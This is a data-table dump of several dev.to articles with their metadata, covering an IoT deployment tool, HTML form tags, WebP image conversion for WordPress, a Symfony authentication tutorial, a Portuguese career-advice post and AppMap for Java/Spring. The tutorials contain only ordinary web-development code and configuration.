id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
807,607 | Showdev: deploy apps to edge devices and servers with Synpse | Synpse allows managing IoT device fleets and servers, deploy apps to them with automated updates, SSH access and TCP port forwarding | 0 | 2021-09-02T14:07:39 | https://dev.to/krusenas/showdev-deploy-apps-to-edge-devices-and-servers-with-synpse-43k4 | showdev, productivity, tooling, iot | ---
title: Showdev: deploy apps to edge devices and servers with Synpse
published: true
description: Synpse allows managing IoT device fleets and servers, deploy apps to them with automated updates, SSH access and TCP port forwarding
tags: showdev, productivity, tooling, iot
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tc40v1y4ye2cuqlabfn6.png
---
Hey dev.to! I wanted to share our project [Synpse](https://synpse.net) that my friend and I have been working on for quite some time.
## TL;DR;
> Registration is now open at https://cloud.synpse.net. Free for up to 5 devices forever. We can increase your quotas if requested. Self-hosted version available as well.
Synpse provides tooling and services to:
- Prepare machine images that you can burn into SD cards to quickly bootstrap hundreds or thousands of devices.
- Generated simple installation script for one-off device/server bootstrap.
- Group devices based on labels (used for both filtering and scheduling applications).
- Automated device naming (based on hostname, random names, etc.).
- Deploy containerized applications (Docker Compose/K8s Pod style).
- Automated device software updates.
- Easily scale to tens or hundreds of thousands of devices.
- SSH into any of your devices through `synpse` CLI or web UI.
- Kubectl style port-forward command to open up TCP tunnels.
- CPU/RAM utilization metrics from device.
## Problem
While it's easy to configure a systemd or some other init service in an OS image to launch your application on device boot - it won't help much for fast updates or gradual rollout. It will also not help much if during the rollout you need to collect some data from applications (logs, SSH access to check some files).
We had a need to deploy quite complex piece of software to ~1200 devices. After looking into a bunch of alternatives like Mender, Balena, Deviceplane we came to a conclusion that it's either:
- Can't use my own image (we had a manufacturer that could only use their own Linux distro, new custom OS was not an option).
- Self-hosting is too complicated.
- Not scaleable (started considerably slowing down with very few devices).
## Solution
What our testing gave us was the understanding that the ideal solution would be:
- Simple self-hosting, a horizontally scaleable controller and a managed database (we chose Postgres) without disrupting your bank balance.
- Must support any Linux OS.
- Don't try to be compatible with neither Kubernetes or Docker Compose in the API/config manifests. These systems require different semantics so it's fine to be similar but 1:1 mapping will just damage the UX.
- SSH and application logs are a must if you have an outage and you need a fast way to debug.
- Everything belongs to a project. Project can have multiple users but the projects should be able to survive multiple generations of users as these systems will last longer than many individual employees.
## The feel
So, one-off device provisioning script + execution parameters can be found in either "devices" or "provisioning" pages:

Once devices are added, they appear in your dashboard for SSH access, monitoring:

You can read more about device management here: https://docs.synpse.net/synpse-core/devices.
You can add various labels and then use them in the application deployment:

View application docs here: https://docs.synpse.net/synpse-core/applications.
Most applications have some shared or private configuration, luckily Synpse provides secrets (similar to Kubernetes ones) where you can reference to them from your application spec:

And when things go south, view your application logs on any of the devices:

## Use cases
As mentioned in the first paragraph, we built Synpse for a medium size fleet of ~1200 IoT devices and a bunch of large servers as it appears that the UX can be much nicer than Docker Compose or Kubernetes. All of those devices are actually card readers in a large bus/trolleybus fleet in Lithuania :)
We would recommend using Synpse for:
- Home lab deployments (up to 5 devices free forever).
- PoS deployments.
- Public transport fleets.
- ML on edge (packaging and running ML inference through Docker containers).
- Any kind of industrial applications where devices can be offline for a prolonged time. Synpse will work well without internet access.
- Normal VMs on cloud providers that don't provide good application deployment UX (most smaller ones like Vultr, DO, Packer, etc.)
## Next steps
If you run software yourself or in a company, you should definitely check it out.
Useful links:
- Docs: https://docs.synpse.net/
- Website: https://synpse.net
- Our Discord channel: https://discord.gg/dkgN4vVNdm | krusenas |
807,709 | Leetcode Solutions to Graph Algorithm Problems | Leetcode contains some of the most popular interview questions asked across organizations. This... | 0 | 2021-08-30T07:42:05 | https://dev.to/abhilash1910/leetcode-solutions-to-graph-algorithm-problems-ak0 | algorithms, computerscience | [Leetcode](https://leetcode.com/) contains some of the most popular interview questions asked across organizations. This youtube playlist contains solutions of some of the most important graph algorithms which are asked in interviews and present in Leetcode:
https://www.youtube.com/watch?v=w9wv2jlF3jY&list=PLovuuDh4TFdCJ00I378H-REodw6AWygN1
Do subscribe if found helpful!
| abhilash1910 |
807,727 | 10 HTML Form Tags You Should Know | This article has been originally posted on Getform Blog. HTML tags can be considered as special... | 0 | 2021-08-30T13:47:00 | https://blog.getform.io/10-html-form-tags-you-should-know/ | This article has been originally posted on [Getform Blog](https://blog.getform.io/10-html-form-tags-you-should-know/?utm_source=dev.to&utm_medium=website&utm_campaign=html-form-tags-article).
----
HTML tags can be considered as special keywords which help web browsers to define how to format and display the content within the website. Since HTML forms are commonly used to collect input from website visitors to receive feedback, support requests, job applications, or more, form-related HTML tags are a lot more interactive than other HTML tags.
In this guide, we will go over all the form-related HTML tags starting from the most known ones like <form> and <input> tags and then continue with the ones that might be very helpful and interesting to use such as <output> and <progress> tags for shaping your HTML forms in the best way.
### HTML Form Tag
The `<form>` tag is used for creating an interactive section, a form to gather user inputs within your website. It defines the area that contains all the form elements for data submission.
The most common and important attributes used with the <form> tag are "action" and "method". The "action" attribute specifies the URL of the service that will receive and process the data after form submission. The "method" attribute on the other hand defines the HTTP method for sending the data which can get the value of either GET or POST.
Here's how the `<form>` tag is used;
```html
<form action="https://getform.io/f/{unique-form-endpoint-goes-here}"
method="POST">
All the form content goes here..
</form>
```
### Input Tag
The `<input>` tag is the most popular one since it helps you to define different kinds of input fields such as text, email address, phone number, dates, file upload, radio buttons, and more.
In order to specify the input field, the "type" attribute is necessary to use with the `<input>` tag. Another useful attribute is "name" which defines the name of the input to be recognized and get the value when it's sent to the server. You can also use the "placeholder" attribute to give a hint to users about what kind of value is expected from the input field. The "required" attribute is also important for specifying the input fields that must be filled out before submitting the form.
Let's add some use cases of the `<input>` tag for different kinds of input fields into the `<form>` tag;
```html
<label for="name">Full Name*:</label>
<input type="text" name="name" placeholder="Your Name*"
required="required">
<label for="email">Email Address*:</label>
<input type="email" name="email" placeholder="Your Email*"
required="required">
<label for="phone">Phone Number</label>
<input type="tel" name="phone" placeholder="1-(555)-555-5555">
<label for="male">Male</label>
<input type="radio" name="gender" />
<label for="female">Female</label>
<input type="radio" name="gender" />
<label for="other">Other</label>
<input type="radio" name="gender">
```
### Label Tag
The `<label>` tag is used for creating a caption or label for input elements on your web form. It provides a short description of the input field.
You can use the `<label>` tag by placing the form control inside it or by adding the "for" attribute which is used for specifying the input element that is bound to the label.
We will add the `<label>` tag to existing input fields and also radio buttons that we will be creating by using <input type="radio">;
{% codepen https://codepen.io/getform/pen/rNwOGLZ %}
### Select & Option Tags
If you need a drop-down menu with various options in your form, then you can use the `<select>` and the `<option>` tags. The <select> tag is used for defining the selection or drop-down list itself. All the options in the list are represented by the <option> tag.
Regarding the attributes, you can use the "name" attribute with the `<select>` tag as well. To define a value for each option in the drop-down list, you should add the "value" attribute to the `<option>` tag.
Here's an example of how it looks like;
{% codepen https://codepen.io/getform/pen/YzQyrKm %}
### Textarea Tag
The `<textarea>` tag is used for creating multi-line text areas that can have an unlimited number of characters. It is a very useful tag for having a form field to gather visitor's comments or messages.
If you want to specify the size of the text area, you can add "rows" and "cols" attributes. The "name" attribute is also used here to define the name that is sent by the browser. Another one is the "maxlength" attribute which allows you to limit the number of characters that can be entered in the text area.
Here's an example;
{% codepen https://codepen.io/getform/pen/OJgyxmW %}
### Optgroup Tag
As one of the lesser-known form-related HTML tags, The `<optgroup>` tag can be very useful if you want your visitors to choose an option from a long drop-down list in an easier way. You can group related <option> elements within the `<select>` list by using the `<optgroup>` tag. You can add the "label" attribute to define a common name for each group of options.
Let's use the `<optgroup>` tag for the drop-down list that we created earlier;
{% codepen https://codepen.io/getform/pen/gORaGmw %}
### Progress Tag
As one of the tags introduced with HTML5, the `<progress>` tag is used for creating a progress bar to display the progress of tasks like uploads or downloads. The most common use case of the tag in web forms is to represent the progress of a file uploading.
To determine the progress value, you can use "value", "min" and "max" attributes with the `<progress>` tag.
Let's create a progress bar for file uploading which will be displayed by the <input type="file">;
{% codepen https://codepen.io/getform/pen/wveMWjE %}
### Fieldset & Legend Tags
You can think of the `<fieldset>` tag as a container for the related form elements. It is helpful to make your form more understandable for users. The `<legend>` tag is there to add a title for the box that is created by the `<fieldset>` tag.
Let's use these tags to group some of the form elements mentioned earlier;
{% codepen https://codepen.io/getform/pen/yLXeJwB %}
### Output Tag
As a newly introduced and lesser-known tag compared to others, the `<output>` tag is used for displaying a result of a calculation or a user action performed usually by a script.
You can use the "name" attribute to indicate a name for the `<output>` tag. To define a unique id for any element in an HTML document, you should use an "id" attribute which allocates a unique identifier used by CSS or javascript to perform certain tasks. Another attribute that can be used with the `<output>` tag is the "for" attribute. It specifies the relationship between the result and the elements that are used in the calculation by listing the "id" attributes.
Let's demonstrate one of the `<output>` tag's use cases built with the help of <input type = "range"> ;
{% codepen https://codepen.io/getform/pen/rNwxLKa %}
### Button Tag
As its name signifies, the `<button>` tag is used for creating clickable buttons within your HTML form. You can also create buttons by using the <input type="button"> but you can not add a text inside the button without the "value" attribute. You should add the "type" attribute to define the type of the button that is sent by browsers.
Here's how it is used;
That's it!
Lastly, let's create a complete Job Application form with the form related HTML tags that we covered earlier.
This example form contains the `<form>` tag with enctype="multipart/form-data" attribute to allow file uploads, `<fieldset>`, `<legend>` , `<label>`, `<select>`, `<option>` `<optgroup>`, `<textarea>`, `<progress>` and `<input>` tags and finally to submit the data `<button>` tag.
To submit the data, we will place a unique form endpoint generated on Getform and place it to action attribute, once submitted here's how it will look on Getform dashboard.

Conclusion
----------
We hope you will find this guide useful for discovering major form-related HTML tags. If you liked this post, don't forget to share and follow us on [LinkedIn](https://www.linkedin.com/company/getform/) and [Twitter](https://twitter.com/getformio) for more updates from Getform blog!
If you would like help setting up Getform on your HTML forms, feel free to reach us out at <info@getform.io>
* * * * *
You can find more information and code samples for different use cases from the resources below.
- [Codepen examples](https://codepen.io/getform)
- [Codesandbox examples](https://codesandbox.io/u/omerozturkh/sandboxes)
- [Getform Documentation](https://docs.getform.io?utm_source=dev.to&utm_medium=website&utm_campaign=html-form-tags-article)
| mertcanyucel | |
807,753 | How to Serve images in next Gen Formats? | Google do recommend converting images from png, jpeg to webp formats that’s why serve images in next... | 0 | 2021-08-30T10:16:19 | https://dev.to/wpsyed/how-to-serve-images-into-next-gen-formats-p9f | programming, wordpress, webdev, devops | Google do recommend converting images from png, jpeg to webp formats that’s why serve images in next gen formats suggestion comes in Google page speed insights. If you don’t know how to fix this issue in your worpdress website then stay here. I will go over a little bit about serving images to next gen formats.
## Table Of Contents
* [What is Webp]
* [Use webp plugin]
* [Convert images to webp by using free tools]
* [ShortPixe]
* [Imagify]
* [Optimole]
Webp is the latest gen formats for images like png, jpeg images. Google prefer smaller size of images that you should use on your web pages. To serve your images in webp formats you simply need to use free tools that we are going to cover later.
Webp images are 26% smaller in size compare to jpeg and png files. On the other hand you can server your high quality images to webp format without losing the quality. This will result in both faster speeds and better PSI reports.
Average webp file size compare to jpeg and png. img source
Here is an example of both webp and jpeg file images and you can see there is no difference at all however webp file is almost 10% smaller than jpeg.
# Use webp plugin
Using a third party webp plugin will save you some time and increase page load time by making a copy of your original images and making the file size smaller.
If you are getting this error down to the google page speed insights report:
Serve images in next gen formats
then you simply need to use some of these free WordPress tools that I have listed down below.
1.Shortpixel (free/paid)
2.Imagify (free/paid)
3.optimole (free)
4.EWWW Image optimizer (free/paid)
5.Wpsmush (Free/paid)
The one I recommend for you is webp converter for media. This plugin is super fast and lightweight and less bloated then others. The developer is well skilled and he coded the plugin in his own way.
Belive me after actiavating this plugin the issue was completely resolved on google page speed insights. I will show you how you can do the same.
Go Over to WordPress dashboard and Add New Plugin.
Webp converter for media optimize your images
After installing and activating the plugin you have to go to setting of this plugin. Now if your server/web host allows htaccess files than it’s fine if does not then you have to select the second option to continue the conversion process.
# webp converter for media plugin settings
But via htaccess files method is recommended by default in this plugin. After all go to bottom of the setting and click on force regenerate all images.
You can also select the quality of your images but, I prefer selecting 85% because it is the perfect for high quality images so you will never lose the quality of your images.
force convert all images from jpeg to webp
This plugin will create copies of your original images and serve them into next gen formats. Now let me show you how I solved this issue quickly at google page speed insights.
To convert your images from jpeg to webp files install webp converter for media.
###serve images in next gen formats
# Convert Images To WebP Using Free Online Tools
if you hate installing third party plugins. Then there are some free tools that you can use to server your iamges in next gen formats. One of my favourite one is CloudConvert’s WebP Converter also a popular choice.
convert images to next gen formats with cloudconvert webp converter
[for more pc speed up guides](https://techchatter.net/)
# Shortpixel
Shortpixel is a great plugin and it has more than 300,000+ Active Installations. The plugin allows you to optimize your images and help you to make your website faster by lazy loading your images.
You can check this option if you want Shortpixel to serve your images in next gen formats.
# Imagify
Imagify is again by far the best plugin but it is limited. If you have tons of images on your website then you have to buy extra credit from imagify. Otherwise I recommend you to stick around with webp converter for media.
Imagify has more than 500,000+ Active Installations in WordPress.
imagify image optimization plugin for wordpress
# Optimole
You can replace any image optimization plugin with optimole after installing optimole you have to get an API key to activate it. After that your all images will be compressed and converted to webp or serve scaled from Cloudfront CDN.
All over this plugin has more than 5 starts rating so you can read more reviews. I don’t comment on this plugin because I don’t personally used it for a while.
# Conclusion
All right wrapping up this tutorial was all about images optimization and serve images in next gen formats which clearly means that it can improve your web page load time if you follow this guide step by step. And google do like fast websites. If you have any question related to speed security and performance then please let me know in the comment box. I will be happy to hear from you guys. | wpsyed |
807,771 | React if you use replit | If you use repl.it kindly react with the heart or unicorn. If you don't then react with a comment... | 0 | 2021-08-30T10:52:18 | https://dev.to/codeboi/react-if-you-use-repl-it-2k1e | poll, debate, codequality, replit | If you use [repl.it](https://replit.com/) kindly react with the heart or unicorn. If you don't then react with a comment saying no and explain why you don't. Or suggest any other code editors would be nice. | codeboi |
807,787 | Implement traditional auth system in Symfony with less code than ever | PHP 8 introduced some new concepts and really helpful syntax features. To significantly reduce the... | 0 | 2021-09-06T10:16:16 | https://dev.to/bornfightcompany/implement-traditional-auth-system-in-symfony-with-less-code-than-ever-5h25 | engineeringmonday, symfony, php, doctrine | PHP 8 introduced some new concepts and really helpful syntax features.
To significantly reduce the boilerplate code, whenever possible, we can use [Constructor property promotion](https://stitcher.io/blog/constructor-promotion-in-php-8). Another thing I'll focus on in this guide is replacing annotations with [PHP attributes](https://stitcher.io/blog/attributes-in-php-8). This will also reduce the number of lines of code in our classes every now and then.
As of version [2.9](https://www.doctrine-project.org/2021/05/24/orm2.9.html), Doctrine supports using PHP 8 Attributes as a new driver for mapping entities.
Not only will we need fewer lines of code than ever for this project, but also we will need to write less of that code ourselves than ever. I’m emphasizing this because we’ll heavily rely on the [Maker bundle](https://symfony.com/bundles/SymfonyMakerBundle/current/index.html) which will generate the majority of files and actual app logic for the project.
At the time of writing this post, Maker bundle still didn’t fully adopt all new PHP possibilities and some adjustments will be done manually.
The goal of the app is to provide a basic traditional authentication system with registration and login features and email verification.
App will have 3 sections: *public* section accessible by everyone, *profile* section available to all logged in users, and *content* section available only to verified users.
Account verification will be done by simply clicking a link in the verification email.
Create a new project:
```console
composer create-project symfony/website-skeleton my_new_app
```
(or use Symfony CLI). I’m using Symfony 5.3.7.
Make sure to update required PHP version in `composer.json`:
```diff
{
"require": {
- "php": ">=7.2.5",
+ "php": "^8.0",
}
}
```
Update Doctrine configuration - use attributes instead of annotations! Without this, generation migrations will not work.
`config/packages/doctrine.yaml`
```diff
doctrine:
orm:
mappings:
App:
- type: annotation
+ type: attribute
```
Now let's make initial `User` entity:
```console
php bin/console make:user
```
Answer `[yes]` or select defaults for all questions in the wizard.
This should create `src/Entity/User.php` and `src/Repository/UserRepository.php` and update `config/packages/security.yaml` files.
Symfony Maker bundle still doesn’t support attributes, but generated entities will still save us a lot of time. We can replace annotations with attributes ourselves.
Use attributes and property types to reduce the amount of code.
`src/Entity/User.php`
```diff
- /**
- * @ORM\Entity(repositoryClass=UserRepository::class)
- */
+ #[ORM\Entity(repositoryClass: UserRepository::class)]
class User implements UserInterface, PasswordAuthenticatedUserInterface
{
- /**
- * @ORM\Id
- * @ORM\GeneratedValue
- * @ORM\Column(type="integer")
- */
- private $id;
+ #[ORM\Id, ORM\GeneratedValue, ORM\Column]
+ private int $id;
- /**
- * @ORM\Column(type="string", length=180, unique=true)
- */
- private $email;
+ #[ORM\Column(length: 180, unique: true)]
+ private string $email;
- /**
- * @ORM\Column(type="json")
- */
+ #[ORM\Column(type: 'json)]
private $roles = [];
- /**
- * @var string The hashed password
- * @ORM\Column(type="string")
- */
- private $password;
+ #[ORM\Column]
+ private string $password;
}
```
Make migration and execute it.
```console
php bin/console make:migration
php bin/console doctrine:migration:migrate
```
Generate simple controllers: `PublicController`, `ProfileController`, `ContentController`. This will add routes `/public`, `/profile` and `/content`. You can do this with Maker as well:
```console
php bin/console make:controller
```
Rename route names for consistency by prefixing them with: `app_`.
All 3 routes should be available to anyone at this stage.
Add role hierarchy and access rules to `config/packages/security.yaml` to achieve what's explained above:
```diff
security:
+ role_hierarchy:
+ ROLE_VERIFIED_USER: [ ROLE_USER ]
access_control:
+ - { path: ^/content, roles: ROLE_VERIFIED_USER }
+ - { path: ^/profile, roles: ROLE_USER }
```
Now you should be getting *401 Unauthorized* error if you try to access `/profile` or `/content`.
Make the login authentication:
```console
php bin/console make:auth
```
Select `[1] Login form authenticator`, call it `LoginFormAuthenticator`, confirm the controller name: `SecurityController` and accept adding the logout route.
This will update the `config/packages/security.yaml` file by adding a logout route and create authenticator, controller and login form files.
First of all, in login form Twig template, replace deprecated `user.username` with `user.userIdentifier`.
```diff
- You are logged in as {{ app.user.username }}, <a href="{{ path('app_logout') }}">Logout</a>
+ You are logged in as {{ app.user.userIdentifier }}, <a href="{{ path('app_logout') }}">Logout</a>
```
In `src/Controller/SecurityController.php` we can replace routes defined by annotations with those defined by attributes.
```diff
class SecurityController extends AbstractController
{
- /**
- * @Route("/login", name="app_login")
- */
+ #[Route('/login', name: 'app_login')]
public function login(AuthenticationUtils $authenticationUtils): Response
- /**
- * @Route("/logout", name="app_logout")
- */
+ #[Route('/logout', name: 'app_logout')]
public function logout()
}
```
Thanks to constructor property promotion in PHP 8, we can rewrite the constructor in `src/Security/LoginFormAuthenticator.php`. While at it, add proper response in `onAuthenticationSuccess` method:
after successful login, redirect to `app_profile` route.
```diff
class LoginFormAuthenticator extends AbstractLoginFormAuthenticator
{
- private UrlGeneratorInterface $urlGenerator;
-
- public function __construct(UrlGeneratorInterface $urlGenerator)
- {
- $this->urlGenerator = $urlGenerator;
- }
+ public function __construct(private UrlGeneratorInterface $urlGenerator)
+ {
+ }
public function onAuthenticationSuccess(Request $request, TokenInterface $token, string $firewallName): ?Response
{
- throw new \Exception('TODO: provide a valid redirect inside '.__FILE__);
+ return new RedirectResponse($this->urlGenerator->generate('app_profile'));
}
}
```
Note: If you're using a Symfony plugin in your code editor and it's complaining it can't find the route with the given name, make sure you've prefixed those routes in controllers as suggested above.
Notice how slim this authenticator became in comparison to what it used to look in older versions of Symfony.
Let’s implement registration logic.
Should we write all of this ourselves? Nope. Maker bundle to the rescue again.
First of all, let’s require another bundle, one for handling email verification logic:
```console
composer require symfonycasts/verify-email-bundle
```
After that, use:
```console
php bin/console make:registration-form
```
Select defaults except the one for including user ID in the link - answer `yes` on that prompt; and select `app_profile` as a route to redirect to after registration.
It's possible that Maker will warn you no Guard authenticators were found and users won't be automatically authenticated after registering. Ignore this for now, we'll implement a solution for this at the end.
The command will change `User` entity and create confirmation email and registration form Twig templates as well as create a `RegistrationController`, `RegistrationFormType` and `EmailVerifier` helper.
Update `src/Entity/User.php` first:
```diff
- /**
- * @UniqueEntity(fields={"email"}, message="There is already an account with this email")
- */
+ #[UniqueEntity(fields: ['email'], message: 'There is already an account with this email')]
class User implements UserInterface, PasswordAuthenticatedUserInterface
{
- /**
- * @ORM\Column(type="boolean")
- */
- private $isVerified = false;
+ #[ORM\Column(options: ['default' => false])]
+ private bool $isVerified = false;
}
```
Generate a migration for adding this new flag and execute it.
```console
php bin/console make:migration
php bin/console doctrine:migration:migrate
```
Symfony recommends putting as little logic as possible in controllers. That’s why complex forms will be moved to dedicated classes instead of defining them in controller actions. Maker did that for us.
There are few things to change in `RegistrationController` - use constructor property promotion and replace deprecated `UserPasswordEncoderInterface` with `UserPasswordHasherInterface`.
At the end of the verification process, redirect to the content page.
```diff
+ use Symfony\Component\PasswordHasher\Hasher\UserPasswordHasherInterface;
- use Symfony\Component\Security\Core\Encoder\UserPasswordEncoderInterface;
class RegistrationController extends AbstractController
{
- private $emailVerifier;
-
- public function __construct(EmailVerifier $emailVerifier)
- {
- $this->emailVerifier = $emailVerifier;
- }
+ public function __construct(private EmailVerifier $emailVerifier)
+ {
+ }
- public function register(Request $request, UserPasswordEncoderInterface $passwordEncoder): Response
+ public function register(Request $request, UserPasswordHasherInterface $passwordHasher): Response
{
$user->setPassword(
- $passwordEncoder->encodePassword(
- $user,
- $form->get('plainPassword')->getData()
- )
+ $passwordHasher->hashPassword($user, $form->get('plainPassword')->getData())
);
}
public function verifyUserEmail(Request $request, UserRepository $userRepository): Response
{
- return $this->redirectToRoute('app_register');
+ return $this->redirectToRoute('app_content');
}
}
```
We want to shorten that constructor in the EmailVerifier class and also add proper user roles after email verification:
```diff
class EmailVerifier
{
- private $verifyEmailHelper;
- private $mailer;
- private $entityManager;
-
- public function __construct(VerifyEmailHelperInterface $helper, MailerInterface $mailer, EntityManagerInterface $manager)
- {
- $this->verifyEmailHelper = $helper;
- $this->mailer = $mailer;
- $this->entityManager = $manager;
- }
+ public function __construct(
+ private VerifyEmailHelperInterface $verifyEmailHelper,
+ private MailerInterface $mailer,
+ private EntityManagerInterface $entityManager
+ ) {
+ }
public function handleEmailConfirmation(Request $request, UserInterface $user): void
{
$user->setIsVerified(true);
+ $user->setRoles(['ROLE_VERIFIED_USER']);
}
}
```
In later versions of Maker bundle where dependency to Guards will be dropped, this might be resolved, but for now we have to implement logging user in after registration manually.
Not a huge deal really. Just inject the `UserAuthenticatorInterface` and our authenticator in the `register` method and authenticate the user before returning the redirect response.
```diff
+ use App\Security\LoginFormAuthenticator;
+ use Symfony\Component\Security\Http\Authentication\UserAuthenticatorInterface;
class RegistrationController extends AbstractController
{
- public function register(Request $request, UserPasswordHasherInterface $passwordHasher): Response
- {
+ public function register(
+ Request $request,
+ UserPasswordHasherInterface $passwordHasher,
+ UserAuthenticatorInterface $authenticator,
+ LoginFormAuthenticator $formAuthenticator
+ ): Response {
if ($form->isSubmitted() && $form->isValid()) {
// ...
+ $authenticator->authenticateUser($user, $formAuthenticator, $request);
return $this->redirectToRoute('app_profile');
}
}
```
That's basically it for the scope of this guide 🤓
Try accessing `/profile` or `/content` route. You should be redirected to the login page. If you still haven't, it's time to register as a new user.
Go to `/register` and enter the desired email and password. You should be logged in automatically and redirected to `/profile`. Accessing `/content` is still not possible.
You should have received a verification email. For this to work out of the box, you only need to set up the `MAILER_DSN` environmental variable according to your mailing server.
After clicking the confirmation link, flag `is_verified` will be set, user role `ROLE_VERIFIED_USER` added and you'll be able to access `/content`.
You can render flash messages or add password reset feature (by including another great bundle: `symfonycasts/reset-password-bundle`) or maybe implement social logins as the next step.
Let me know in the comments if code snippets with diffs weren't clear enough or if you have any other questions. | gh0c |
807,964 | Carreira na área de TI | Este post é uma lista de comentários que fiz no grupo t.me/SegInfoBRasil sobre como dar os passos... | 0 | 2021-08-30T12:00:52 | https://dev.to/vitormattos/carreira-na-area-de-ti-4n7l | career, opensource, beginners | 
Este post é uma lista de comentários que fiz no grupo t.me/SegInfoBRasil sobre como dar os passos em uma carreira na área de tecnologia:
Participe de comunidades não apenas consumindo, participe de forma ativa e tem várias maneiras de fazer isto:
* Auxiliar na administração cutucando admins quando ver qualquer comportamento estranho no grupo
* Auxiliar atualizando alguma página na web da comunidade. Mande PR com atualizações, abra issues para interagir com a atual coordenação e resolva as issues que abrir. Só aí já vai aprender coisa para caramba, git, comandos básicos de Linux, markdown, etc. Sem contar que vai criar currículo e currículo público.
* Auxilie dando apoio na organização de eventos online, divulgação de eventos, gestão de redes sociais. Para tudo isto não requer conhecimento técnico, vai ajudar e muito a comunidade e tudo isto sempre tem consequências positivas que retornam para quem o faz.
* Participe de comunidades relacionadas a área de atuação que tu tem interesse de atuar, procure saber dos eventos e participe dos eventos.
* Siga profissionais da área em redes sociais, gitlab, github, e veja o que o povo tem feito.
* Faça alguma faculdade na área de tecnologia. Ensino acadêmico pode soar meio enfadonho mas é essencial ter este conhecimento de como colocar todos os conhecimentos de forma organizada em cada caixinha sabendo qual é todo o fluxo de vida de algo na área de TI, da reunião inicial com o cliente, análise, desenvolvimento, implementação, entrega, manutenção.
* Faça cursos online. Se possível dê uma conferida na comunidade para saber se o curso presta. Tem muito material aí na internet que é lixo total. Hoje em dia o que mais tem é videoaula em YouTube de tudo que possa imaginar, tudo de graça, então pagar por um curso, na maioria dos casos é só ter o material que tá de graça no YouTube e em toda a internet.
* Só pra reforçar: Não use a comunidade como um local para consumir conhecimento mas contribua, interaja, ajude a comunidade a crescer de forma ativa.
* Contribua com a tradução de projetos diversos. Tem muito manual pra ser traduzido neste mundo. PHP hoje é a linguagem web mais usada do mundo em aproximadamente 80% dos sites que acessamos e só tem traduzido para português uns 10% do manual do PHP e destes 10% tem muita coisa desatualizada. Com isto vai aprender inglês, vai ajudar pra caramba a comunidade, vai aprende muita coisa interessante.
* Crie tutoriais no dev.to de tudo o que você fizer.
- Ah, é coisa boba, aprendi a usar o comando grep no Linux.
Só esta coisa boba já dá pra tu fazer até palestra pra levar para eventos.
Documente tudo, tudo! Vai instalar uma distro Linux? Faz tutorial. Aprendeu um comando novo? Cria tutorial. Faz tutorial de tudo!
Já tem uma penca na internet mas isto ajudará você a exercitar teu raciocínio. Quando a gente se presta a ensinar algo a alguém a consolidação do conhecimento em nossa mente é absurdamente maior.
* Use GNU Linux!!!!!!!
* Use software livre, corte software proprietário da tua vida. FLOSS é vida. E volta o assunto: participe das comunidades dos softwares que usar.
* RTFM
* É bom também gravar vídeo tutoriais, se não quiser aparecer, coloca máscara do Anonymous (zoeira), se não quiser aparecer deixa só o áudio e a tela compartilhada. Um videotutorial de 5 minutinhos com um how-to apresentando um sistema, um comando ou algo maneiro que descobriu vai enriquecer muito mais o teu tutorial de texto no dev-to.
* Ache algum projeto que curta e acompanhe o desenvolvimento do mesmo, veja as issues, tente se esforçar em interagir, procure alguma issue para iniciantes e contribua com o projeto codando também.
É isso pessoal! | vitormattos |
807,980 | See how Java frameworks like Spring work with your code | Spring + Your Code = ❤️ Most of the time! The one criticism that sticks to the Spring framework (and... | 0 | 2021-08-30T13:01:29 | https://dev.to/appmap/see-how-java-frameworks-like-spring-work-with-your-code-1acl | java, debugging, webdev | Spring + Your Code = ❤️ Most of the time!
The one criticism that sticks to the Spring framework (and other big web frameworks, to be honest), is that Spring does so much for you it can be hard to understand what's really going on. Sometimes, we can just follow the doc and tutorials and watch the magic happen. But sometimes, we really need
to understand how Spring, and related packages, actually work. And even more importantly, how they work with **our code**.
You're already familiar with using debuggers - and Java has an excellent debugger compared to some other languages. When you use a debugger, you take an "inside-out" approach to troubleshooting. You choose a point in your code where you want to start, and then you can explore outwards from
there. But while you can get a lot of detailed information that way, it's hard to build an understanding of what's going on overall in the codebase.
To build that kind of high-level understanding, you need more of an "outside-in" approach. Here's a cookbook you can follow to see how your code works with Spring and other Java libraries, starting from the widest scope and narrowing in on details. To do that, I will show you how to use an open
source tool called [AppMap](https://appland.com/products/appmap). AppMap records the runtime behavior of your code and stores it as JSON files called AppMaps. Then you can open AppMaps files in your code editor ([VSCode](https://marketplace.visualstudio.com/items?itemName=appland.appmap) or [IntelliJ](https://plugins.jetbrains.com/plugin/16701-appmap)) and view and search dependency maps and execution trace diagrams.
Here's how you use it:
### 1. Install the appmap-java agent
Follow the [quick start guide for VSCode or IntelliJ](https://appland.com/docs/quickstart/).
Here's a quick checklist:
- Add the appmap Java agent to your Maven or Gradle configuration - or just download the JAR file from [https://github.com/applandinc/appmap-java/releases](https://github.com/applandinc/appmap-java/releases)
- Create `appmap.yml` and configure your project name and primary package names.
### 2. Add additional package names, such as `org.springframework.web`, to `appmap.yml`
Here's an example [`appmap.yml`](https://github.com/land-of-apps/spring-petclinic/tree/appmap-e2e/appmap.yml) that I use with my fork of the Spring Pet Clinic.
### 3. Record the AppMap of code execution
You have several choices of how to record your code:
**Option 1: Test case(s)**
If you have JUnit or TestNG tests that cover your app, run your tests with the AppMap Gradle or Maven integration enabled.
**Option 2: Record user actions and API requests**
If you don't have a test that does what you need, you can use your app and get an AppMap of all the actions you perform. This is called “remote recording,” and to use it, you run your web server with the flag `-javaagent:appmap.jar`. If your app is an API server, run the server and send API requests. Either way, you'll get an `appmap.json` file when the server exits.
**Option 3: Record the entire server run, including startup and shutdown**
The AppMap Java agent supports a System property `appmap.recording.auto`. If you set this property
to true, the server process is recorded from start to finish, and the results are written to a timestamped `appmap.json` file when the process exits.
### 4. View the diagrams
The AppMap extension for VSCode and IntelliJ enables you to open any `*.appmap.json` and explore it visually. To open AppMaps in the code editor, open the AppMaps “Tool Window” (IntelliJ) or AppMaps sidebar (VSCode).
Click on an AppMap to view the Dependency map in your code editor window. From there, you can search,
browse, and drill down into the Trace view.
## Demo - Pet Clinic + org.springframework.web
As I indicated above, AppMap is a flexible tool and there are several ways to use it. Let’s start with a fairly simple, but quite useful and illustrative example.
